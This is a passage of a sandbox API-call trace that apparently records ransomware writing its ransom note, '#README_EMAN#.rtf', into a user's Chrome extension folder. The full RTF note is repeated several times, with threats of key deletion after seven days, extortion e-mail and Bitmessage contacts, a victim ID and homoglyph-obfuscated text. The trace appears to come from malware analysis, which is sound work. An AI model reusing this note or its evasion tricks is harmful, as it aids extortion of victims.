tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.170] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.171] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.171] CloseHandle (hObject=0x2ec) returned 1 [0291.171] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\#readme_eman#.rtf")) returned 0xffffffff [0291.171] GetLastError () returned 0x2 [0291.171] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.172] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 